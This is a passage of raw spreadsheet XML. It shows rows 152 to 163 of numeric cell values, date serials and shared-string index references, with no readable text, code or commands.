      <c r="X152">
        <v>0</v>
      </c>
      <c r="Y152">
        <v>0</v>
      </c>
      <c r="Z152">
        <v>0</v>
      </c>
      <c r="AA152">
        <v>1000</v>
      </c>
      <c r="AB152">
        <v>200</v>
      </c>
      <c r="AC152">
        <v>1000</v>
      </c>
      <c r="AD152">
        <v>0</v>
      </c>
      <c r="AE152">
        <v>10000</v>
      </c>
      <c r="AF152" t="s">
        <v>1348</v>
      </c>
      <c r="AG152">
        <v>61121</v>
      </c>
      <c r="AH152">
        <v>16</v>
      </c>
      <c r="AJ152">
        <v>252</v>
      </c>
      <c r="AK152" t="s">
        <v>387</v>
      </c>
      <c r="AL152" t="s">
        <v>388</v>
      </c>
      <c r="AM152" t="s">
        <v>1349</v>
      </c>
      <c r="AN152" t="s">
        <v>82</v>
      </c>
      <c r="AO152">
        <v>2003</v>
      </c>
      <c r="AP152">
        <v>313976351</v>
      </c>
      <c r="AQ152" t="s">
        <v>1350</v>
      </c>
      <c r="AR152" t="s">
        <v>1351</v>
      </c>
      <c r="AS152" t="s">
        <v>71</v>
      </c>
      <c r="AT152" t="s">
        <v>86</v>
      </c>
      <c r="AU152">
        <v>1</v>
      </c>
      <c r="AV152">
        <v>1</v>
      </c>
      <c r="AW152">
        <v>15</v>
      </c>
      <c r="AX152">
        <v>190</v>
      </c>
      <c r="AY152">
        <v>8</v>
      </c>
      <c r="AZ152">
        <v>11</v>
      </c>
      <c r="BA152" t="s">
        <v>16644</v>
      </c>
      <c r="BB152" t="s">
        <v>14420</v>
      </c>
      <c r="BC152">
        <v>0</v>
      </c>
      <c r="BD152" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="153" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A153">
        <v>684</v>
      </c>
      <c r="B153" t="s">
        <v>1352</v>
      </c>
      <c r="C153" t="s">
        <v>458</v>
      </c>
      <c r="D153" t="s">
        <v>1353</v>
      </c>
      <c r="E153" t="s">
        <v>843</v>
      </c>
      <c r="F153" t="s">
        <v>859</v>
      </c>
      <c r="G153" s="1">
        <v>44006</v>
      </c>
      <c r="H153">
        <v>3876</v>
      </c>
      <c r="I153">
        <v>3876</v>
      </c>
      <c r="J153">
        <v>0</v>
      </c>
      <c r="K153">
        <v>0</v>
      </c>
      <c r="L153">
        <v>0</v>
      </c>
      <c r="M153">
        <v>0</v>
      </c>
      <c r="N153">
        <v>0</v>
      </c>
      <c r="O153">
        <v>0</v>
      </c>
      <c r="P153">
        <v>0</v>
      </c>
      <c r="Q153">
        <v>0</v>
      </c>
      <c r="R153">
        <v>20</v>
      </c>
      <c r="S153">
        <v>1</v>
      </c>
      <c r="T153">
        <v>0</v>
      </c>
      <c r="U153">
        <v>0</v>
      </c>
      <c r="V153">
        <v>0</v>
      </c>
      <c r="W153">
        <v>0</v>
      </c>
      <c r="X153">
        <v>0</v>
      </c>
      <c r="Y153">
        <v>0</v>
      </c>
      <c r="Z153">
        <v>0</v>
      </c>
      <c r="AA153">
        <v>0</v>
      </c>
      <c r="AB153">
        <v>200</v>
      </c>
      <c r="AC153">
        <v>200</v>
      </c>
      <c r="AD153">
        <v>1</v>
      </c>
      <c r="AE153">
        <v>0</v>
      </c>
      <c r="AF153" t="s">
        <v>1354</v>
      </c>
      <c r="AG153">
        <v>0</v>
      </c>
      <c r="AH153">
        <v>5</v>
      </c>
      <c r="AJ153">
        <v>149</v>
      </c>
      <c r="AK153" t="s">
        <v>1355</v>
      </c>
      <c r="AL153" t="s">
        <v>1356</v>
      </c>
      <c r="AM153" t="s">
        <v>1357</v>
      </c>
      <c r="AN153" t="s">
        <v>68</v>
      </c>
      <c r="AO153">
        <v>2014</v>
      </c>
      <c r="AP153" t="s">
        <v>1358</v>
      </c>
      <c r="AQ153">
        <v>81276211708</v>
      </c>
      <c r="AR153" t="s">
        <v>1354</v>
      </c>
      <c r="AS153" t="s">
        <v>71</v>
      </c>
      <c r="AT153" t="s">
        <v>72</v>
      </c>
      <c r="AU153">
        <v>14</v>
      </c>
      <c r="AV153">
        <v>0</v>
      </c>
      <c r="AW153">
        <v>7</v>
      </c>
      <c r="AX153">
        <v>0</v>
      </c>
      <c r="AY153">
        <v>2</v>
      </c>
      <c r="AZ153">
        <v>4</v>
      </c>
      <c r="BA153" t="s">
        <v>17378</v>
      </c>
      <c r="BB153" t="s">
        <v>14775</v>
      </c>
      <c r="BC153" t="s">
        <v>10222</v>
      </c>
      <c r="BD153" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="154" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A154">
        <v>803</v>
      </c>
      <c r="B154" t="s">
        <v>1359</v>
      </c>
      <c r="C154" t="s">
        <v>458</v>
      </c>
      <c r="D154" t="s">
        <v>1360</v>
      </c>
      <c r="E154" t="s">
        <v>111</v>
      </c>
      <c r="F154" t="s">
        <v>1361</v>
      </c>
      <c r="G154" s="1">
        <v>44089</v>
      </c>
      <c r="H154">
        <v>3894</v>
      </c>
      <c r="I154">
        <v>3894</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t="s">
        <v>1362</v>
      </c>
      <c r="AG154">
        <v>0</v>
      </c>
      <c r="AH154">
        <v>5</v>
      </c>
      <c r="AJ154">
        <v>154</v>
      </c>
      <c r="AK154" t="s">
        <v>964</v>
      </c>
      <c r="AL154" t="s">
        <v>964</v>
      </c>
      <c r="AM154" t="s">
        <v>1363</v>
      </c>
      <c r="AN154" t="s">
        <v>55</v>
      </c>
      <c r="AO154">
        <v>2015</v>
      </c>
      <c r="AP154" t="s">
        <v>1364</v>
      </c>
      <c r="AQ154" t="s">
        <v>1365</v>
      </c>
      <c r="AR154" t="s">
        <v>1362</v>
      </c>
      <c r="AU154">
        <v>30</v>
      </c>
      <c r="AV154">
        <v>1</v>
      </c>
      <c r="AW154">
        <v>0</v>
      </c>
      <c r="AX154">
        <v>0</v>
      </c>
      <c r="AY154">
        <v>15</v>
      </c>
      <c r="AZ154">
        <v>1</v>
      </c>
      <c r="BA154">
        <v>0</v>
      </c>
      <c r="BB154" t="s">
        <v>14864</v>
      </c>
      <c r="BC154" t="s">
        <v>10518</v>
      </c>
      <c r="BD154" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="155" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A155">
        <v>662</v>
      </c>
      <c r="B155" t="s">
        <v>1366</v>
      </c>
      <c r="C155" t="s">
        <v>458</v>
      </c>
      <c r="D155" t="s">
        <v>1367</v>
      </c>
      <c r="E155" t="s">
        <v>843</v>
      </c>
      <c r="F155" t="s">
        <v>1368</v>
      </c>
      <c r="G155" s="1">
        <v>44006</v>
      </c>
      <c r="H155">
        <v>3909</v>
      </c>
      <c r="I155">
        <v>3909</v>
      </c>
      <c r="J155">
        <v>0</v>
      </c>
      <c r="K155">
        <v>0</v>
      </c>
      <c r="L155">
        <v>0</v>
      </c>
      <c r="M155">
        <v>0</v>
      </c>
      <c r="N155">
        <v>0</v>
      </c>
      <c r="O155">
        <v>0</v>
      </c>
      <c r="P155">
        <v>0</v>
      </c>
      <c r="Q155">
        <v>10</v>
      </c>
      <c r="R155">
        <v>25</v>
      </c>
      <c r="S155">
        <v>0</v>
      </c>
      <c r="T155">
        <v>0</v>
      </c>
      <c r="U155">
        <v>0</v>
      </c>
      <c r="V155">
        <v>0</v>
      </c>
      <c r="W155">
        <v>0</v>
      </c>
      <c r="X155">
        <v>0</v>
      </c>
      <c r="Y155">
        <v>0</v>
      </c>
      <c r="Z155">
        <v>0</v>
      </c>
      <c r="AA155">
        <v>0</v>
      </c>
      <c r="AB155">
        <v>200</v>
      </c>
      <c r="AC155">
        <v>200</v>
      </c>
      <c r="AD155">
        <v>0</v>
      </c>
      <c r="AE155">
        <v>0</v>
      </c>
      <c r="AF155" t="s">
        <v>1369</v>
      </c>
      <c r="AG155">
        <v>0</v>
      </c>
      <c r="AH155">
        <v>5</v>
      </c>
      <c r="AJ155">
        <v>149</v>
      </c>
      <c r="AK155" t="s">
        <v>1355</v>
      </c>
      <c r="AL155" t="s">
        <v>1356</v>
      </c>
      <c r="AM155" t="s">
        <v>1370</v>
      </c>
      <c r="AN155" t="s">
        <v>68</v>
      </c>
      <c r="AO155">
        <v>2015</v>
      </c>
      <c r="AP155" t="s">
        <v>1371</v>
      </c>
      <c r="AQ155" t="s">
        <v>1372</v>
      </c>
      <c r="AR155" t="s">
        <v>1369</v>
      </c>
      <c r="AS155" t="s">
        <v>71</v>
      </c>
      <c r="AT155" t="s">
        <v>72</v>
      </c>
      <c r="AU155">
        <v>10</v>
      </c>
      <c r="AV155">
        <v>0</v>
      </c>
      <c r="AW155">
        <v>2</v>
      </c>
      <c r="AX155">
        <v>0</v>
      </c>
      <c r="AY155">
        <v>2</v>
      </c>
      <c r="AZ155">
        <v>1</v>
      </c>
      <c r="BA155" t="s">
        <v>17377</v>
      </c>
      <c r="BB155" t="s">
        <v>14759</v>
      </c>
      <c r="BC155" t="s">
        <v>10222</v>
      </c>
      <c r="BD155" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="156" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A156">
        <v>746</v>
      </c>
      <c r="B156" t="s">
        <v>1373</v>
      </c>
      <c r="C156" t="s">
        <v>726</v>
      </c>
      <c r="D156" t="s">
        <v>1374</v>
      </c>
      <c r="E156" t="s">
        <v>300</v>
      </c>
      <c r="F156" t="s">
        <v>1375</v>
      </c>
      <c r="G156" s="1">
        <v>44235</v>
      </c>
      <c r="H156">
        <v>3925</v>
      </c>
      <c r="I156">
        <v>3925</v>
      </c>
      <c r="J156">
        <v>1</v>
      </c>
      <c r="K156">
        <v>1</v>
      </c>
      <c r="L156">
        <v>1</v>
      </c>
      <c r="M156">
        <v>0</v>
      </c>
      <c r="N156">
        <v>0</v>
      </c>
      <c r="O156">
        <v>1</v>
      </c>
      <c r="P156">
        <v>0</v>
      </c>
      <c r="Q156">
        <v>0</v>
      </c>
      <c r="R156">
        <v>2</v>
      </c>
      <c r="S156">
        <v>0</v>
      </c>
      <c r="T156">
        <v>3</v>
      </c>
      <c r="U156">
        <v>60000</v>
      </c>
      <c r="V156">
        <v>20000</v>
      </c>
      <c r="W156">
        <v>1000</v>
      </c>
      <c r="X156">
        <v>0</v>
      </c>
      <c r="Y156">
        <v>0</v>
      </c>
      <c r="Z156">
        <v>1000</v>
      </c>
      <c r="AA156">
        <v>0</v>
      </c>
      <c r="AB156">
        <v>0</v>
      </c>
      <c r="AC156">
        <v>100000</v>
      </c>
      <c r="AD156">
        <v>0</v>
      </c>
      <c r="AE156">
        <v>100000</v>
      </c>
      <c r="AF156" t="s">
        <v>1376</v>
      </c>
      <c r="AG156">
        <v>97795</v>
      </c>
      <c r="AH156">
        <v>32</v>
      </c>
      <c r="AJ156">
        <v>465</v>
      </c>
      <c r="AK156" t="s">
        <v>1377</v>
      </c>
      <c r="AL156" t="s">
        <v>1378</v>
      </c>
      <c r="AM156" t="s">
        <v>1379</v>
      </c>
      <c r="AN156" t="s">
        <v>55</v>
      </c>
      <c r="AO156">
        <v>2016</v>
      </c>
      <c r="AP156">
        <v>81354767291</v>
      </c>
      <c r="AQ156" t="s">
        <v>1380</v>
      </c>
      <c r="AR156" t="s">
        <v>1381</v>
      </c>
      <c r="AS156" t="s">
        <v>71</v>
      </c>
      <c r="AT156" t="s">
        <v>58</v>
      </c>
      <c r="AU156">
        <v>26</v>
      </c>
      <c r="AV156">
        <v>1</v>
      </c>
      <c r="AW156">
        <v>22</v>
      </c>
      <c r="AX156">
        <v>10</v>
      </c>
      <c r="AY156">
        <v>4</v>
      </c>
      <c r="AZ156">
        <v>1</v>
      </c>
      <c r="BA156">
        <v>0</v>
      </c>
      <c r="BB156" t="s">
        <v>14822</v>
      </c>
      <c r="BC156">
        <v>0</v>
      </c>
      <c r="BD156" t="s">
        <v>11084</v>
      </c>
    </row>
    <row r="157" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A157">
        <v>764</v>
      </c>
      <c r="B157" t="s">
        <v>1382</v>
      </c>
      <c r="C157" t="s">
        <v>157</v>
      </c>
      <c r="D157" t="s">
        <v>1383</v>
      </c>
      <c r="E157" t="s">
        <v>916</v>
      </c>
      <c r="F157" t="s">
        <v>1384</v>
      </c>
      <c r="G157" s="1">
        <v>44070</v>
      </c>
      <c r="H157">
        <v>3934</v>
      </c>
      <c r="I157">
        <v>3934</v>
      </c>
      <c r="J157">
        <v>0</v>
      </c>
      <c r="K157">
        <v>3</v>
      </c>
      <c r="L157">
        <v>0</v>
      </c>
      <c r="M157">
        <v>0</v>
      </c>
      <c r="N157">
        <v>0</v>
      </c>
      <c r="O157">
        <v>0</v>
      </c>
      <c r="P157">
        <v>0</v>
      </c>
      <c r="Q157">
        <v>62</v>
      </c>
      <c r="R157">
        <v>0</v>
      </c>
      <c r="S157">
        <v>0</v>
      </c>
      <c r="T157">
        <v>1</v>
      </c>
      <c r="U157">
        <v>0</v>
      </c>
      <c r="V157">
        <v>10725</v>
      </c>
      <c r="W157">
        <v>0</v>
      </c>
      <c r="X157">
        <v>0</v>
      </c>
      <c r="Y157">
        <v>0</v>
      </c>
      <c r="Z157">
        <v>0</v>
      </c>
      <c r="AA157">
        <v>0</v>
      </c>
      <c r="AB157">
        <v>2480</v>
      </c>
      <c r="AC157">
        <v>0</v>
      </c>
      <c r="AD157">
        <v>0</v>
      </c>
      <c r="AE157">
        <v>17000</v>
      </c>
      <c r="AF157" t="s">
        <v>1385</v>
      </c>
      <c r="AG157">
        <v>61384</v>
      </c>
      <c r="AH157">
        <v>16</v>
      </c>
      <c r="AJ157">
        <v>243</v>
      </c>
      <c r="AK157" t="s">
        <v>1386</v>
      </c>
      <c r="AL157" t="s">
        <v>1387</v>
      </c>
      <c r="AM157" t="s">
        <v>1388</v>
      </c>
      <c r="AN157" t="s">
        <v>55</v>
      </c>
      <c r="AO157">
        <v>2016</v>
      </c>
      <c r="AP157" t="s">
        <v>1389</v>
      </c>
      <c r="AQ157" t="s">
        <v>1390</v>
      </c>
      <c r="AR157" t="s">
        <v>1391</v>
      </c>
      <c r="AS157" t="s">
        <v>71</v>
      </c>
      <c r="AT157" t="s">
        <v>58</v>
      </c>
      <c r="AU157">
        <v>25</v>
      </c>
      <c r="AV157">
        <v>2</v>
      </c>
      <c r="AW157">
        <v>49</v>
      </c>
      <c r="AX157">
        <v>53</v>
      </c>
      <c r="AY157">
        <v>10</v>
      </c>
      <c r="AZ157">
        <v>9</v>
      </c>
      <c r="BA157">
        <v>0</v>
      </c>
      <c r="BB157" t="s">
        <v>14836</v>
      </c>
      <c r="BC157">
        <v>0</v>
      </c>
      <c r="BD157" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="158" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A158">
        <v>383</v>
      </c>
      <c r="B158" t="s">
        <v>1392</v>
      </c>
      <c r="C158" t="s">
        <v>157</v>
      </c>
      <c r="D158" t="s">
        <v>1393</v>
      </c>
      <c r="E158" t="s">
        <v>1394</v>
      </c>
      <c r="F158" t="s">
        <v>1395</v>
      </c>
      <c r="G158" s="1">
        <v>44090</v>
      </c>
      <c r="H158">
        <v>3976</v>
      </c>
      <c r="I158">
        <v>3976</v>
      </c>
      <c r="J158">
        <v>3</v>
      </c>
      <c r="K158">
        <v>0</v>
      </c>
      <c r="L158">
        <v>4</v>
      </c>
      <c r="M158">
        <v>0</v>
      </c>
      <c r="N158">
        <v>0</v>
      </c>
      <c r="O158">
        <v>0</v>
      </c>
      <c r="P158">
        <v>6</v>
      </c>
      <c r="Q158">
        <v>3</v>
      </c>
      <c r="R158">
        <v>5</v>
      </c>
      <c r="S158">
        <v>20</v>
      </c>
      <c r="T158">
        <v>2</v>
      </c>
      <c r="U158">
        <v>1200000</v>
      </c>
      <c r="V158">
        <v>0</v>
      </c>
      <c r="W158">
        <v>10000</v>
      </c>
      <c r="X158">
        <v>0</v>
      </c>
      <c r="Y158">
        <v>0</v>
      </c>
      <c r="Z158">
        <v>0</v>
      </c>
      <c r="AA158">
        <v>50000</v>
      </c>
      <c r="AB158">
        <v>30000</v>
      </c>
      <c r="AC158">
        <v>50000</v>
      </c>
      <c r="AD158">
        <v>60000</v>
      </c>
      <c r="AE158">
        <v>300000000</v>
      </c>
      <c r="AF158" t="s">
        <v>1396</v>
      </c>
      <c r="AG158">
        <v>68472</v>
      </c>
      <c r="AH158">
        <v>16</v>
      </c>
      <c r="AJ158">
        <v>237</v>
      </c>
      <c r="AK158" t="s">
        <v>377</v>
      </c>
      <c r="AL158" t="s">
        <v>1397</v>
      </c>
      <c r="AM158" t="s">
        <v>1398</v>
      </c>
      <c r="AN158" t="s">
        <v>82</v>
      </c>
      <c r="AO158">
        <v>1970</v>
      </c>
      <c r="AP158" t="s">
        <v>1399</v>
      </c>
      <c r="AQ158" t="s">
        <v>1400</v>
      </c>
      <c r="AR158" t="s">
        <v>1396</v>
      </c>
      <c r="AS158" t="s">
        <v>71</v>
      </c>
      <c r="AT158" t="s">
        <v>86</v>
      </c>
      <c r="AU158">
        <v>25</v>
      </c>
      <c r="AV158">
        <v>1</v>
      </c>
      <c r="AW158">
        <v>54</v>
      </c>
      <c r="AX158">
        <v>288</v>
      </c>
      <c r="AY158">
        <v>16</v>
      </c>
      <c r="AZ158">
        <v>15</v>
      </c>
      <c r="BA158" t="s">
        <v>16679</v>
      </c>
      <c r="BB158" t="s">
        <v>14531</v>
      </c>
      <c r="BC158">
        <v>0</v>
      </c>
      <c r="BD158" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="159" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A159">
        <v>528</v>
      </c>
      <c r="B159" t="s">
        <v>1401</v>
      </c>
      <c r="C159" t="s">
        <v>579</v>
      </c>
      <c r="D159" t="s">
        <v>1402</v>
      </c>
      <c r="E159" t="s">
        <v>49</v>
      </c>
      <c r="F159" t="s">
        <v>1403</v>
      </c>
      <c r="G159" s="1">
        <v>44071</v>
      </c>
      <c r="H159">
        <v>3995</v>
      </c>
      <c r="I159">
        <v>3995</v>
      </c>
      <c r="J159">
        <v>0</v>
      </c>
      <c r="K159">
        <v>0</v>
      </c>
      <c r="L159">
        <v>0</v>
      </c>
      <c r="M159">
        <v>0</v>
      </c>
      <c r="N159">
        <v>0</v>
      </c>
      <c r="O159">
        <v>0</v>
      </c>
      <c r="P159">
        <v>0</v>
      </c>
      <c r="Q159">
        <v>0</v>
      </c>
      <c r="R159">
        <v>0</v>
      </c>
      <c r="S159">
        <v>1</v>
      </c>
      <c r="T159">
        <v>1</v>
      </c>
      <c r="U159">
        <v>0</v>
      </c>
      <c r="V159">
        <v>0</v>
      </c>
      <c r="W159">
        <v>0</v>
      </c>
      <c r="X159">
        <v>0</v>
      </c>
      <c r="Y159">
        <v>0</v>
      </c>
      <c r="Z159">
        <v>0</v>
      </c>
      <c r="AA159">
        <v>0</v>
      </c>
      <c r="AB159">
        <v>0</v>
      </c>
      <c r="AC159">
        <v>0</v>
      </c>
      <c r="AD159">
        <v>1</v>
      </c>
      <c r="AE159">
        <v>50</v>
      </c>
      <c r="AF159" t="s">
        <v>1404</v>
      </c>
      <c r="AG159">
        <v>75125</v>
      </c>
      <c r="AH159">
        <v>23</v>
      </c>
      <c r="AJ159">
        <v>364</v>
      </c>
      <c r="AK159" t="s">
        <v>1405</v>
      </c>
      <c r="AL159" t="s">
        <v>1406</v>
      </c>
      <c r="AM159" t="s">
        <v>1407</v>
      </c>
      <c r="AN159" t="s">
        <v>68</v>
      </c>
      <c r="AO159">
        <v>2009</v>
      </c>
      <c r="AP159">
        <v>85247617409</v>
      </c>
      <c r="AQ159" t="s">
        <v>1408</v>
      </c>
      <c r="AR159" t="s">
        <v>1404</v>
      </c>
      <c r="AS159" t="s">
        <v>71</v>
      </c>
      <c r="AT159" t="s">
        <v>72</v>
      </c>
      <c r="AU159">
        <v>21</v>
      </c>
      <c r="AV159">
        <v>1</v>
      </c>
      <c r="AW159">
        <v>1</v>
      </c>
      <c r="AX159">
        <v>4</v>
      </c>
      <c r="AY159">
        <v>1</v>
      </c>
      <c r="AZ159">
        <v>0</v>
      </c>
      <c r="BA159" t="s">
        <v>17405</v>
      </c>
      <c r="BB159" t="s">
        <v>14646</v>
      </c>
      <c r="BC159" t="s">
        <v>11366</v>
      </c>
      <c r="BD159">
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A160">
        <v>621</v>
      </c>
      <c r="B160" t="s">
        <v>1409</v>
      </c>
      <c r="C160" t="s">
        <v>157</v>
      </c>
      <c r="D160" t="s">
        <v>1410</v>
      </c>
      <c r="E160" t="s">
        <v>142</v>
      </c>
      <c r="F160" t="s">
        <v>562</v>
      </c>
      <c r="G160" s="1">
        <v>44067</v>
      </c>
      <c r="H160">
        <v>4010</v>
      </c>
      <c r="I160">
        <v>4010</v>
      </c>
      <c r="J160">
        <v>2</v>
      </c>
      <c r="K160">
        <v>0</v>
      </c>
      <c r="L160">
        <v>0</v>
      </c>
      <c r="M160">
        <v>3</v>
      </c>
      <c r="N160">
        <v>9800</v>
      </c>
      <c r="O160">
        <v>0</v>
      </c>
      <c r="P160">
        <v>0</v>
      </c>
      <c r="Q160">
        <v>0</v>
      </c>
      <c r="R160">
        <v>0</v>
      </c>
      <c r="S160">
        <v>0</v>
      </c>
      <c r="T160">
        <v>0</v>
      </c>
      <c r="U160">
        <v>140</v>
      </c>
      <c r="V160">
        <v>0</v>
      </c>
      <c r="W160">
        <v>0</v>
      </c>
      <c r="X160">
        <v>13650</v>
      </c>
      <c r="Y160">
        <v>0</v>
      </c>
      <c r="Z160">
        <v>0</v>
      </c>
      <c r="AA160">
        <v>0</v>
      </c>
      <c r="AB160">
        <v>0</v>
      </c>
      <c r="AC160">
        <v>0</v>
      </c>
      <c r="AD160">
        <v>0</v>
      </c>
      <c r="AE160">
        <v>0</v>
      </c>
      <c r="AF160" t="s">
        <v>1411</v>
      </c>
      <c r="AG160">
        <v>68453</v>
      </c>
      <c r="AH160">
        <v>16</v>
      </c>
      <c r="AJ160">
        <v>237</v>
      </c>
      <c r="AK160" t="s">
        <v>1412</v>
      </c>
      <c r="AL160" t="s">
        <v>1413</v>
      </c>
      <c r="AM160" t="s">
        <v>1414</v>
      </c>
      <c r="AN160" t="s">
        <v>82</v>
      </c>
      <c r="AO160">
        <v>1984</v>
      </c>
      <c r="AP160" t="s">
        <v>1415</v>
      </c>
      <c r="AQ160" t="s">
        <v>1416</v>
      </c>
      <c r="AR160" t="s">
        <v>1417</v>
      </c>
      <c r="AS160" t="s">
        <v>71</v>
      </c>
      <c r="AT160" t="s">
        <v>86</v>
      </c>
      <c r="AU160">
        <v>26</v>
      </c>
      <c r="AV160">
        <v>1</v>
      </c>
      <c r="AW160">
        <v>0</v>
      </c>
      <c r="AX160">
        <v>340</v>
      </c>
      <c r="AY160">
        <v>143</v>
      </c>
      <c r="AZ160">
        <v>177</v>
      </c>
      <c r="BA160" t="s">
        <v>17383</v>
      </c>
      <c r="BB160" t="s">
        <v>14725</v>
      </c>
      <c r="BC160">
        <v>0</v>
      </c>
      <c r="BD160" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="161" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A161">
        <v>479</v>
      </c>
      <c r="B161" t="s">
        <v>1418</v>
      </c>
      <c r="C161" t="s">
        <v>157</v>
      </c>
      <c r="D161" t="s">
        <v>1419</v>
      </c>
      <c r="E161" t="s">
        <v>142</v>
      </c>
      <c r="F161" t="s">
        <v>1420</v>
      </c>
      <c r="G161" s="1">
        <v>44004</v>
      </c>
      <c r="H161">
        <v>4027</v>
      </c>
      <c r="I161">
        <v>4027</v>
      </c>
      <c r="J161">
        <v>6</v>
      </c>
      <c r="K161">
        <v>0</v>
      </c>
      <c r="L161">
        <v>4</v>
      </c>
      <c r="M161">
        <v>0</v>
      </c>
      <c r="N161">
        <v>0</v>
      </c>
      <c r="O161">
        <v>0</v>
      </c>
      <c r="P161">
        <v>0</v>
      </c>
      <c r="Q161">
        <v>2</v>
      </c>
      <c r="R161">
        <v>2</v>
      </c>
      <c r="S161">
        <v>0</v>
      </c>
      <c r="T161">
        <v>0</v>
      </c>
      <c r="U161">
        <v>1100000</v>
      </c>
      <c r="V161">
        <v>0</v>
      </c>
      <c r="W161">
        <v>15000</v>
      </c>
      <c r="X161">
        <v>0</v>
      </c>
      <c r="Y161">
        <v>0</v>
      </c>
      <c r="Z161">
        <v>0</v>
      </c>
      <c r="AA161">
        <v>0</v>
      </c>
      <c r="AB161">
        <v>50</v>
      </c>
      <c r="AC161">
        <v>300</v>
      </c>
      <c r="AD161">
        <v>0</v>
      </c>
      <c r="AE161">
        <v>0</v>
      </c>
      <c r="AF161" t="s">
        <v>1421</v>
      </c>
      <c r="AG161">
        <v>60183</v>
      </c>
      <c r="AH161">
        <v>16</v>
      </c>
      <c r="AJ161">
        <v>264</v>
      </c>
      <c r="AK161" t="s">
        <v>211</v>
      </c>
      <c r="AL161" t="s">
        <v>1422</v>
      </c>
      <c r="AM161" t="s">
        <v>1423</v>
      </c>
      <c r="AN161" t="s">
        <v>55</v>
      </c>
      <c r="AO161">
        <v>2006</v>
      </c>
      <c r="AP161" t="s">
        <v>1424</v>
      </c>
      <c r="AQ161" t="s">
        <v>1425</v>
      </c>
      <c r="AR161" t="s">
        <v>1426</v>
      </c>
      <c r="AS161" t="s">
        <v>71</v>
      </c>
      <c r="AT161" t="s">
        <v>58</v>
      </c>
      <c r="AU161">
        <v>26</v>
      </c>
      <c r="AV161">
        <v>0</v>
      </c>
      <c r="AW161">
        <v>15</v>
      </c>
      <c r="AX161">
        <v>15</v>
      </c>
      <c r="AY161">
        <v>8</v>
      </c>
      <c r="AZ161">
        <v>4</v>
      </c>
      <c r="BA161" t="s">
        <v>16703</v>
      </c>
      <c r="BB161" t="s">
        <v>14607</v>
      </c>
      <c r="BC161">
        <v>0</v>
      </c>
      <c r="BD161" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="162" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A162">
        <v>131</v>
      </c>
      <c r="B162" t="s">
        <v>1427</v>
      </c>
      <c r="C162" t="s">
        <v>99</v>
      </c>
      <c r="D162" t="s">
        <v>1428</v>
      </c>
      <c r="E162" t="s">
        <v>1429</v>
      </c>
      <c r="F162" t="s">
        <v>1430</v>
      </c>
      <c r="G162" s="1">
        <v>44147</v>
      </c>
      <c r="H162">
        <v>4044</v>
      </c>
      <c r="I162">
        <v>4044</v>
      </c>
      <c r="J162">
        <v>3</v>
      </c>
      <c r="K162">
        <v>0</v>
      </c>
      <c r="L162">
        <v>2</v>
      </c>
      <c r="M162">
        <v>0</v>
      </c>
      <c r="N162">
        <v>0</v>
      </c>
      <c r="O162">
        <v>0</v>
      </c>
      <c r="P162">
        <v>0</v>
      </c>
      <c r="Q162">
        <v>1</v>
      </c>
      <c r="R162">
        <v>3</v>
      </c>
      <c r="S162">
        <v>0</v>
      </c>
      <c r="T162">
        <v>2</v>
      </c>
      <c r="U162">
        <v>1300000</v>
      </c>
      <c r="V162">
        <v>0</v>
      </c>
      <c r="W162">
        <v>6000</v>
      </c>
      <c r="X162">
        <v>0</v>
      </c>
      <c r="Y162">
        <v>0</v>
      </c>
      <c r="Z162">
        <v>0</v>
      </c>
      <c r="AA162">
        <v>0</v>
      </c>
      <c r="AB162">
        <v>1000</v>
      </c>
      <c r="AC162">
        <v>5000000</v>
      </c>
      <c r="AD162">
        <v>0</v>
      </c>
      <c r="AE162">
        <v>3000</v>
      </c>
      <c r="AF162" t="s">
        <v>1431</v>
      </c>
      <c r="AG162">
        <v>14440</v>
      </c>
      <c r="AH162">
        <v>12</v>
      </c>
      <c r="AJ162">
        <v>160</v>
      </c>
      <c r="AK162" t="s">
        <v>114</v>
      </c>
      <c r="AL162" t="s">
        <v>114</v>
      </c>
      <c r="AM162" t="s">
        <v>1432</v>
      </c>
      <c r="AN162" t="s">
        <v>55</v>
      </c>
      <c r="AO162">
        <v>2010</v>
      </c>
      <c r="AP162" t="s">
        <v>1433</v>
      </c>
      <c r="AQ162" t="s">
        <v>1434</v>
      </c>
      <c r="AR162" t="s">
        <v>1435</v>
      </c>
      <c r="AS162" t="s">
        <v>71</v>
      </c>
      <c r="AT162" t="s">
        <v>58</v>
      </c>
      <c r="AU162">
        <v>24</v>
      </c>
      <c r="AV162">
        <v>1</v>
      </c>
      <c r="AW162">
        <v>21</v>
      </c>
      <c r="AX162">
        <v>2</v>
      </c>
      <c r="AY162">
        <v>17</v>
      </c>
      <c r="AZ162">
        <v>4</v>
      </c>
      <c r="BA162" t="s">
        <v>16617</v>
      </c>
      <c r="BB162" t="s">
        <v>14325</v>
      </c>
      <c r="BC162">
        <v>0</v>
      </c>
      <c r="BD162">
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A163">
        <v>368</v>
      </c>
      <c r="B163" t="s">
        <v>1436</v>
      </c>
      <c r="C163" t="s">
        <v>74</v>
      </c>
      <c r="D163" t="s">
        <v>1437</v>
      </c>
      <c r="E163" t="s">
        <v>300</v>
      </c>
      <c r="F163" t="s">
        <v>1438</v>
      </c>
      <c r="G163" s="1">
        <v>44039</v>
      </c>
      <c r="H163">
        <v>4054</v>
      </c>
      <c r="I163">
        <v>4054</v>
      </c>
      <c r="J163">
        <v>1</v>
      </c>
      <c r="K163">
        <v>0</v>
      </c>
      <c r="L163">
        <v>0</v>
      </c>
      <c r="M163">
        <v>0</v>
      </c>
      <c r="N163">
        <v>0</v>
      </c>
      <c r="O163">
        <v>0</v>
      </c>
      <c r="P163">
        <v>0</v>
      </c>
      <c r="Q163">
        <v>0</v>
